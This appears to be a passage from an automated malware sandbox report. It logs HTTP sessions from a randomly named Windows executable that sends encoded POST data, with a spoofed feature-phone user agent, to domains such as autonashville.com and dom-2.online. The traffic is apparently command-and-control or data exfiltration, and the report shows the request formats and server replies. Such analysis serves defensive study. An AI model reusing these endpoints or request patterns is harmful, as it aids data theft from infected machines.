                    Data Raw: 36 58 3d 38 50 6e 65 62 77 6d 4a 61 66 49 70 44 58 71 71 52 55 53 73 4c 35 33 6e 71 39 43 58 66 77 52 78 61 79 37 4b 66 73 4f 54 70 37 50 76 7a 32 76 72 65 67 58 41 44 61 48 69 74 54 5a 41 68 77 63 50 49 53 5a 48 43 61 5a 71 6e 4d 58 4b 75 38 66 6b 31 62 34 62 5a 76 37 52 2f 2f 50 4a 35 68 2b 36 43 6c 65 73 6f 69 4b 66 4d 2f 79 4e 39 71 31 32 34 4b 66 6f 66 48 2b 67 4a 49 57 5a 76 61 6b 7a 43 68 35 7a 58 34 59 34 49 6b 68 69 74 74 7a 2b 77 31 54 45 52 41 6b 56 44 78 56 32 67 42 41 54 54 37 56 6a 74 6f 59 71 4b 37 64 75 73 71 75 35 6d 6f 5a 6f 33 41 68 43 69 69 74 2b 79 2f 49 47 54 4a 42 46 4c 31 37 64 4a 5a 74 79 64 37 33 51 4c 33 57 58 4b 55 32 7a 46 52 62 4d 42 43 6a 75 44 36 32 31 77 65 76 58 33 46 45 6d 33 47 79 70 46 78 49 78 68 44 5a 6a 41 4b 38 74 48 71 48 42 72 41 55 72 79 55 68 68 71 45 63 32 4f 4f 51 43 46 74 31 6e 69 41 36 36 6f 79 65 6f 6d 43 35 43 61 66 6c 69 71 4e 2b 78 62 4d 30 50 6f 51 52 48 5a 36 4d 33 30 6f 64 47 32 71 79 4c 73 71 75 7a 4d 6a 72 4a 32 42 7a 7a 49 49 54 42 6d 69 35 [TRUNCATED]
                    Data Ascii: 6X=8PnebwmJafIpDXqqRUSsL53nq9CXfwRxay7KfsOTp7Pvz2vregXADaHitTZAhwcPISZHCaZqnMXKu8fk1b4bZv7R//PJ5h+6ClesoiKfM/yN9q124KfofH+gJIWZvakzCh5zX4Y4Ikhittz+w1TERAkVDxV2gBATT7VjtoYqK7dusqu5moZo3AhCiit+y/IGTJBFL17dJZtyd73QL3WXKU2zFRbMBCjuD621wevX3FEm3GypFxIxhDZjAK8tHqHBrAUryUhhqEc2OOQCFt1niA66oyeomC5CafliqN+xbM0PoQRHZ6M30odG2qyLsquzMjrJ2BzzIITBmi537sWl/AagbTWcLRWwzns0oUjpEY9rNQYeshWqf9ZmL/hiT8NyVPQ1umYeELWFdmodAPf03h+Y1gamM6cY+4D3BNf6V+q/RstEWTSKlVDkkP21XKI3w7M7jNj1W2g4Wig5DqTBZiW9pveSgO2sXLD/L6TP/qIAQt6O5qA7rYYVmnU32SaXbGMY8Fme89yKmP5LGuqofdHr7McFiClJwjrKd2K11Hjl63bqwYxqdW07dAnvHv8n4G8i79pIjI30vCpCaPtmAu7vUbcxpjHA4vqzhfClOyMOKIC6WXdWjR4LzeQ+DzUMVHnSH9PjxaV11GC+x6wo2P7xG9L887YH+owLUSrnrJiZ4BkfKbKDmn0VpyQXoOyhnd5ZWSW+I1KGeVnpGAjmF66gcw05ZcaBl4trG/J3stHSNeR1/arQRmeQRTBH564c6hJOjfZhNxOTkxEiwuGkCHdzcfU5s6VsnuAk9cUxEfQhjQP/ql9clC5e7HoLmvyqhEDQE/gz72/B0wvav0iGM0i9GiQs+OPeiYwU8hJwImUo1LdbHrEDGb+boppZzQlhfn816JhTgveumNr82B7iYnVHRwyWF95HNDyfjzvX94+FILNYHmnXrab7b1UGzHg3Cn4+7ujwJ/BhbQgavZ4L3+V9Nb+YoUwshCbpg+FA+CKdoP1ip [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    16192.168.2.44975347.104.180.139805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:10.658143997 CEST484OUTGET /6m23/?6X=xNP+YF7kN8YyHFbGfhCbM4vPtrObLTBpZTX0aom8zYno+17KeimnOIL9nX5Ojh8oMyFsBplL+bbJn9Xx4KkSTeDh/PbqhhexF1uqyGHiSdrf0qV82I/xPx8=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.zhuoyueapp.top
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:41:11.892486095 CEST545INHTTP/1.1 404 Not Found
                    Date: Sun, 22 Sep 2024 15:41:11 GMT
                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                    Strict-Transport-Security: max-age=3153600000; includeSubDomains
                    X-Content-Type-Options: nosniff
                    X-XSS-Protection: 1; mode=block
                    Content-Length: 203
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 36 6d 32 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /6m23/ was not found on this server.</p></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    17192.168.2.4497543.33.130.190805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:25.057770967 CEST751OUTPOST /7d10/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.autonashville.com
                    Origin: http://www.autonashville.com
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.autonashville.com/7d10/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 56 52 38 79 76 50 34 2f 78 4d 6c 36 39 52 59 69 4d 61 7a 62 6d 4f 62 73 43 75 48 4f 36 51 55 47 2f 45 4a 52 56 5a 79 62 4b 2b 76 76 32 6c 30 73 70 77 57 72 6e 6b 58 32 72 53 6a 72 42 4c 34 4d 79 62 6b 59 74 7a 2b 77 31 39 75 54 44 62 7a 59 62 79 45 37 52 68 7a 4a 4d 32 2f 45 6a 33 63 4e 78 48 4e 65 69 41 47 4a 52 56 71 38 48 6f 62 72 2f 5a 63 70 59 71 79 50 44 2f 61 35 55 55 56 31 66 4d 63 4d 71 55 67 62 66 37 39 2f 67 31 36 64 77 49 54 4b 74 73 34 68 31 77 49 52 47 38 79 2b 77 66 6a 78 46 48 79 43 58 50 52 7a 79 4f 33 6b 4c 70 71 39 52 41 3d 3d
                    Data Ascii: 6X=8kguG0/ZDb87VR8yvP4/xMl69RYiMazbmObsCuHO6QUG/EJRVZybK+vv2l0spwWrnkX2rSjrBL4MybkYtz+w19uTDbzYbyE7RhzJM2/Ej3cNxHNeiAGJRVq8Hobr/ZcpYqyPD/a5UUV1fMcMqUgbf79/g16dwITKts4h1wIRG8y+wfjxFHyCXPRzyO3kLpq9RA==


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    18192.168.2.4497553.33.130.190805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:27.610074997 CEST771OUTPOST /7d10/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.autonashville.com
                    Origin: http://www.autonashville.com
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.autonashville.com/7d10/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 58 78 4d 79 74 75 34 2f 32 73 6c 39 34 52 59 69 43 36 7a 66 6d 50 6e 73 43 72 72 65 36 6a 77 47 78 41 46 52 55 64 6d 62 4a 2b 76 76 78 56 31 6f 6b 51 58 6c 6e 6b 61 4c 72 54 66 72 42 50 51 4d 79 62 55 59 73 41 57 7a 30 74 75 52 4d 37 7a 61 56 53 45 37 52 68 7a 4a 4d 32 62 69 6a 33 45 4e 78 32 39 65 6a 6c 79 4b 59 31 71 2f 4e 49 62 72 31 35 63 6c 59 71 79 39 44 2b 48 53 55 58 74 31 66 4e 73 4d 70 46 67 59 56 37 39 31 76 56 37 51 68 39 69 7a 6f 4a 52 51 2f 41 63 59 42 63 32 59 34 35 79 72 55 32 54 56 46 50 31 41 76 4a 2b 51 47 71 58 30 4b 44 78 6b 52 66 52 48 4c 79 54 44 66 65 56 6f 46 42 78 45 41 4d 77 3d
                    Data Ascii: 6X=8kguG0/ZDb87XxMytu4/2sl94RYiC6zfmPnsCrre6jwGxAFRUdmbJ+vvxV1okQXlnkaLrTfrBPQMybUYsAWz0tuRM7zaVSE7RhzJM2bij3ENx29ejlyKY1q/NIbr15clYqy9D+HSUXt1fNsMpFgYV791vV7Qh9izoJRQ/AcYBc2Y45yrU2TVFP1AvJ+QGqX0KDxkRfRHLyTDfeVoFBxEAMw=


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    19192.168.2.4497563.33.130.190805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:30.156694889 CEST10853OUTPOST /7d10/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.autonashville.com
                    Origin: http://www.autonashville.com
                    Content-Length: 10299
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.autonashville.com/7d10/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 38 6b 67 75 47 30 2f 5a 44 62 38 37 58 78 4d 79 74 75 34 2f 32 73 6c 39 34 52 59 69 43 36 7a 66 6d 50 6e 73 43 72 72 65 36 6a 34 47 78 31 5a 52 55 36 4b 62 49 2b 76 76 2b 46 31 6c 6b 51 57 35 6e 6b 53 48 72 54 54 37 42 4e 59 4d 7a 36 30 59 38 68 57 7a 39 74 75 52 4f 37 7a 58 62 79 45 75 52 68 6a 4e 4d 32 4c 69 6a 33 45 4e 78 30 6c 65 67 77 47 4b 65 31 71 38 48 6f 62 6e 2f 5a 64 4d 59 75 6d 48 44 2b 7a 6b 56 6d 4e 31 66 74 38 4d 36 48 59 59 54 72 39 7a 73 56 36 44 68 39 6d 53 6f 4e 49 76 2f 41 6f 68 42 65 71 59 36 39 6d 38 4d 32 58 4e 5a 75 46 62 2f 4a 75 50 4f 35 76 71 4d 68 68 6e 48 4b 4e 70 58 43 48 63 51 35 67 4d 41 43 70 48 66 6f 45 4b 73 2b 51 56 4b 32 75 70 71 66 6c 4a 73 53 69 6b 64 71 4a 51 75 6d 39 67 43 6d 6e 44 57 65 56 2f 2b 4a 4a 7a 4f 46 41 68 66 62 4a 37 41 34 71 38 65 32 6f 6a 57 78 39 48 6a 2b 65 74 4a 56 6a 67 73 4a 72 2b 7a 57 4a 4e 6b 30 48 30 55 69 57 55 55 37 68 6d 6a 71 6e 35 59 6e 35 6e 55 2b 54 6c 69 59 4b 69 5a 57 43 2f 65 4f 76 79 64 71 43 4b 30 45 2b 45 63 37 32 [TRUNCATED]
                    Data Ascii: 6X=8kguG0/ZDb87XxMytu4/2sl94RYiC6zfmPnsCrre6j4Gx1ZRU6KbI+vv+F1lkQW5nkSHrTT7BNYMz60Y8hWz9tuRO7zXbyEuRhjNM2Lij3ENx0legwGKe1q8Hobn/ZdMYumHD+zkVmN1ft8M6HYYTr9zsV6Dh9mSoNIv/AohBeqY69m8M2XNZuFb/JuPO5vqMhhnHKNpXCHcQ5gMACpHfoEKs+QVK2upqflJsSikdqJQum9gCmnDWeV/+JJzOFAhfbJ7A4q8e2ojWx9Hj+etJVjgsJr+zWJNk0H0UiWUU7hmjqn5Yn5nU+TliYKiZWC/eOvydqCK0E+Ec72HouXSvNmrbRz0KtT1AhTVGVt58rgbDb+f6MnYF5nZxSPAPx+0QVznZ0GZ01jO//2Ugc+HolWqirDdcawoN4uhTI06xUz7lZldNZvI45sSJ8lRLe8JcnXqxVs/zbn8Lu6yL0hxQm50AunbpOJ63IPCOb2xOQI0JNhmcx8Tx4ZYxY3lvJmeSvAa+bI4VfrkiVjpeLM7IT+WulvjxHgJKOKWU8gCDqNG/tmlTS/TCAoiVv3AICXbgo+WuCFyeOvjf5M0Ngqy1hkem//ng6OelVRBwNmCQetwq2fnyvzXrxV2AkKzoF85nkQpq0osJaUBe0Lx5c/8fGfNmQ/Rmrb5iPeIO1QQvcqtde+6tMguzrdS5TWOJCdplZ5EvnRo0Zk0qzTb1WUdfyaMPOdPg4VScEbz8kzXUnIocWrZA7wh7gNRLT4PB7wgCco+tizhGrltealFS6DGwHeMQt2gQ/Be9OBNSsBkLn5bCVdHSJQNh/UyndoW9MTthk5CpKDOkTR70H7zx1sAhiXSuh3u8E6fNLP5koQo1aCEzGzVfJag+82tcNkcNikViwCQVv6AgLLSs8n3ps6S1oXPccP026ge/QtY4ZsNnD11mpwm2DsxtoRZue/8oRkDSRidQaLPaiDdQwMbNrklmYdFP9/H/XD/o4if2kmf9bDG7fP3A [TRUNCATED]


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.4497573.33.130.190805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:32.696283102 CEST487OUTGET /7d10/?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzp HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Host: www.autonashville.com
                    Connection: close
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Sep 22, 2024 17:41:33.165461063 CEST400INHTTP/1.1 200 OK
                    Server: openresty
                    Date: Sun, 22 Sep 2024 15:41:33 GMT
                    Content-Type: text/html
                    Content-Length: 260
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 58 3d 78 6d 49 4f 46 42 69 58 56 72 30 2f 51 69 42 74 6c 66 70 70 79 63 70 36 39 67 34 67 49 4b 76 2f 6c 4e 7a 55 66 37 76 43 38 7a 63 45 30 6e 46 69 59 5a 53 32 4c 4d 2b 32 33 32 67 70 75 7a 36 38 6c 6c 58 66 6a 41 33 35 42 72 6f 49 37 36 67 45 6d 69 65 66 38 70 53 7a 42 4b 33 5a 56 54 38 65 66 7a 58 6a 4c 67 62 69 6a 56 41 41 35 6e 55 6b 73 51 75 64 49 77 30 3d 26 5f 76 66 74 3d 76 78 57 6c 62 44 69 38 69 70 61 34 39 6a 7a 70 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6X=xmIOFBiXVr0/QiBtlfppycp69g4gIKv/lNzUf7vC8zcE0nFiYZS2LM+232gpuz68llXfjA35BroI76gEmief8pSzBK3ZVT8efzXjLgbijVAA5nUksQudIw0=&_vft=vxWlbDi8ipa49jzp"}</script></head></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.449758199.59.243.227805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:46.343069077 CEST736OUTPOST /m409/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.dom-2.online
                    Origin: http://www.dom-2.online
                    Content-Length: 199
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.dom-2.online/m409/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 68 54 56 75 74 54 48 56 35 4e 45 4d 76 30 5a 30 35 78 4a 4b 70 6c 75 49 68 38 7a 68 74 51 33 65 6a 52 63 55 43 6d 6d 74 67 72 71 2b 78 58 4f 6a 77 76 30 47 6f 71 67 59 46 50 75 4d 35 57 52 44 4b 6d 6e 62 58 38 37 2b 4b 56 74 35 4e 79 2b 6a 4e 43 66 49 45 33 42 6f 79 48 69 30 55 75 55 38 48 75 4d 52 37 33 45 78 39 59 4b 48 7a 4d 70 43 4e 73 34 6f 52 70 57 6d 71 61 6c 6f 71 5a 7a 46 79 57 4a 62 63 65 6d 33 69 70 66 4b 6c 32 57 52 56 47 7a 67 67 74 2f 71 72 77 31 4a 47 7a 45 52 41 76 77 71 52 30 53 31 4f 2b 56 56 58 59 73 61 4f 52 62 6c 73 77 3d 3d
                    Data Ascii: 6X=ii7XstaMoFqjhTVutTHV5NEMv0Z05xJKpluIh8zhtQ3ejRcUCmmtgrq+xXOjwv0GoqgYFPuM5WRDKmnbX87+KVt5Ny+jNCfIE3BoyHi0UuU8HuMR73Ex9YKHzMpCNs4oRpWmqaloqZzFyWJbcem3ipfKl2WRVGzggt/qrw1JGzERAvwqR0S1O+VVXYsaORblsw==
                    Sep 22, 2024 17:41:46.915824890 CEST1236INHTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:46 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1114
                    x-request-id: 5d57d9fc-8aea-40ee-a5fd-37fa40c7b870
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                    set-cookie: parking_session=5d57d9fc-8aea-40ee-a5fd-37fa40c7b870; expires=Sun, 22 Sep 2024 15:56:46 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                    Sep 22, 2024 17:41:46.916270018 CEST567INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                    Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNWQ1N2Q5ZmMtOGFlYS00MGVlLWE1ZmQtMzdmYTQwYzdiODcwIiwicGFnZV90aW1lIjoxNzI3MDE5Nz


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.449759199.59.243.227805924C:\Program Files (x86)\FvdkyCKcMgvnarrmeddOFIrGtjedqzfkTnowfoiAQyT\yRUFfzlnDkMN.exe
                    TimestampBytes transferredDirectionData
                    Sep 22, 2024 17:41:48.889799118 CEST756OUTPOST /m409/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                    Accept-Language: en-US,en;q=0.9
                    Accept-Encoding: gzip, deflate
                    Host: www.dom-2.online
                    Origin: http://www.dom-2.online
                    Content-Length: 219
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Referer: http://www.dom-2.online/m409/
                    User-Agent: SAMSUNG-GT-E2350B/1.0 Openwave/6.2.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
                    Data Raw: 36 58 3d 69 69 37 58 73 74 61 4d 6f 46 71 6a 69 7a 6c 75 72 77 76 56 75 39 45 44 7a 45 5a 30 7a 52 4a 4f 70 6c 71 49 68 34 72 78 74 69 6a 65 6a 30 67 55 42 6a 61 74 6c 72 71 2b 6c 6e 4f 6d 2b 50 30 33 6f 71 63 36 46 50 69 4d 35 57 56 44 4b 6e 58 62 58 50 54 39 4c 46 73 66 42 53 2f 6c 4a 43 66 49 45 33 42 6f 79 47 53 65 55 75 63 38 48 65 51 52 36 57 45 77 7a 34 4b 47 79 4d 70 43 61 38 34 7a 52 70 57 55 71 62 35 4f 71 62 37 46 79 58 5a 62 64 4c 4b 30 6f 70 65 67 68 32 57 47 57 33 61 72 74 74 75 74 30 43 78 75 4e 51 63 54 42 70 68 77 41 46 7a 69 63 2b 78 6d 4b 66 6c 75 44 53 6d 73 33 35 70 53 71 73 37 57 54 50 52 68 6e 76 61 34 6a 57 78 33 64 56 73 3d
                    Data Ascii: 6X=ii7XstaMoFqjizlurwvVu9EDzEZ0zRJOplqIh4rxtijej0gUBjatlrq+lnOm+P03oqc6FPiM5WVDKnXbXPT9LFsfBS/lJCfIE3BoyGSeUuc8HeQR6WEwz4KGyMpCa84zRpWUqb5Oqb7FyXZbdLK0opegh2WGW3arttut0CxuNQcTBphwAFzic+xmKfluDSms35pSqs7WTPRhnva4jWx3dVs=
                    Sep 22, 2024 17:41:49.394556046 CEST1236INHTTP/1.1 200 OK
                    date: Sun, 22 Sep 2024 15:41:48 GMT
                    content-type: text/html; charset=utf-8
                    content-length: 1114
                    x-request-id: b8f4cb3f-73eb-433e-88ac-2b9deddd6d2c
                    cache-control: no-store, max-age=0
                    accept-ch: sec-ch-prefers-color-scheme
                    critical-ch: sec-ch-prefers-color-scheme
                    vary: sec-ch-prefers-color-scheme
                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DV72QOOcF7+jyywSza6czds8fbNsxiEEsG94RrhvKl4k+o48jpWUVyCE9RVGzjbORMjwgPHWpZK0Ia0GPsZ9FQ==
                    set-cookie: parking_session=b8f4cb3f-73eb-433e-88ac-2b9deddd6d2c; expires=Sun, 22 Sep 2024 15:56:49 GMT; path=/
                    connection: close
                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 56 37 32 51 4f 4f 63 46 37 2b 6a 79 79 77 53 7a 61 36 63 7a 64 73 38 66 62 4e 73 78 69 45 45 73 47 39 34 52 72 68 76 4b 6c 34 6b 2b 6f 34 38 6a 70 57 55 56 79 43 45 39 52 56 47 7a 6a 62 4f 52 4d 6a 77 67 50 48 57 70 5a 4b 30 49 61 30 47 50 73 5a 39 46 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
